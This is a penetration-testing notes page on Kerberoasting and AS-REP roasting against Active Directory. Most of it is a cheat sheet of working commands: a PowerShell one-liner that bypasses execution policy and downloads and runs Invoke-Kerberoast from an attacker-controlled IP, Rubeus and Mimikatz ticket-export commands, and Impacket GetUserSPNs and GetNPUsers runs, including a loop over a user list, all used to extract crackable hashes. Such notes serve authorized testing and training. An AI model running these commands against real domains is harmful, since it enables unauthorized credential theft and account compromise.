Pentest Notes
  • About
  • Notes
    • Methodologies & Tools
      • Scanning & Enumeration
        • Scanning
        • Port 21 - FTP
        • Port 22 - SSH
        • Port 23 - telnet
        • Port 25 - SMTP
          • Enumerate Users via SMTP
        • Port 53 - DNS
        • Port 110 - POP3
        • Port 111 - RPCBind
        • Port 123 - NTP
        • Port 139, 445 - SMB
        • Port 143 - IMAP
        • Port 161 - SNMP
        • Port 389 - LDAP
        • Port 1521 - Oracle DB Listener
        • Port 1433 - MSSQL
        • Port 2049 - NFS
        • Port 3306 - MySQL/MariaDB
        • Port 3389 - RDP
        • Port 5432 - Postgres
        • Port 6379 - Redis
        • Port 27017 - MongoDB
      • Active Directory
        • Housekeeping
        • DNS Recon
        • Finding Users
        • Client Side Attacks
        • PowerShell Domain Enumeration
        • Roasting
        • Mimikatz
        • Credential Attacks
        • Bloodhound
        • Persistence
        • Group Policy Attack Tools
        • Service Account Exploits
        • Delegation
        • Cheatsheets
        • Tool Repos
      • Privilege Escalation
        • Windows
          • Basic Methodology
          • UAC Bypass
          • Privilege Exploits
          • Service Exploits
          • Password Hunting
          • Scheduled Tasks
          • Insecure File Permissions
          • Driver Kernel Exploits
          • LAPS Password
          • AlwaysInstallElevated
          • SMBGhost
          • PowerShell
          • PowerUp
          • Enable Remote Desktop
          • Cheatsheets
        • Linux
          • Shell Upgrade
          • Basic Methodology
          • Adding User to /etc/passwd
          • Add User to /etc/sudoers
          • Docker Breakout
          • LD_Library
          • Checking Weird Binaries
          • Outdated Bash
          • NFS Root Squash
          • Resources
      • Web
        • IDOR
        • LFI - Local File Inclusion
          • Windows LFI List
        • RFI - Remote File Inclusion
        • Command Injection
        • Server Side Template Injection - SSTI
        • SQL Injection
          • Blind Injection Sample Script
        • XSS
        • Authentication
        • Administrative Portals
        • NodeJS
        • 403 Forbidden Bypass
      • Network Pivoting
      • Tools
        • Compiling
        • Cracking
        • Port Knocking
        • Shells
        • SQL
      • File Transfer
      • External
Powered by GitBook
On this page
  • Kerberoasting
  • AS-Rep Roasting
  1. Notes
  2. Methodologies & Tools
  3. Active Directory

Roasting

PreviousPowerShell Domain EnumerationNextMimikatz

Last updated 2 years ago

Kerberoasting

From Windows Shell

PowerShell One-Liner

  • Downloads Invoke-Kerberoast.ps1 from Kali, executes it, and saves output to file for hashcat reversing

powershell -ep bypass -c "IEX (New-Object System.Net.WebClient).DownloadString('http://192.168.49.121/Invoke-Kerberoast.ps1') ; Invoke-Kerberoast -OutputFormat HashCat|Select-Object -ExpandProperty hash | out-file -Encoding ASCII kerb-Hash0.txt"

Rubeus

Get-NetUser -SPN | select cn
Request-SPNTicket
Rubeus.exe kerberoast /format:hashcat > Hash1

Mimikatz

kerberos::ask /target:SPN
kerberos::list /export

  • No pass or admin required:

kerberos::list
kerberos::list /export

From Kali

No Passwords, Known-Good Users

GetUserSPNs.py $DOMAIN/ -nopass -usersfile users.txt

With Full Creds

GetUserSPNs.py -request -dc-ip $target $domain/username:password

More Kerberos in-depth:

AS-Rep Roasting

  • More rare than kerberoasting because something has to be set manually, namely the ‘no preauth required’ has to be unchecked on the account, meaning it doesn't need to use kerberos to request

GetNPUsers.py -dc-ip $target domain.com/username:password

  • or without any password!

GetNPUsers.py -no-pass domain.com/username

  • Or from a list

for user in $(cat users); do GetNPUsers.py -no-pass -dc-ip $IP domain.local/$user | grep krb5asrep; done

  • If you've added to hosts file you won't need the IP written explicitly

https://www.pentestpartners.com/security-blog/how-to-kerberoast-like-a-boss/
https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a
https://www.youtube.com/watch?v=beRDcvBwTBw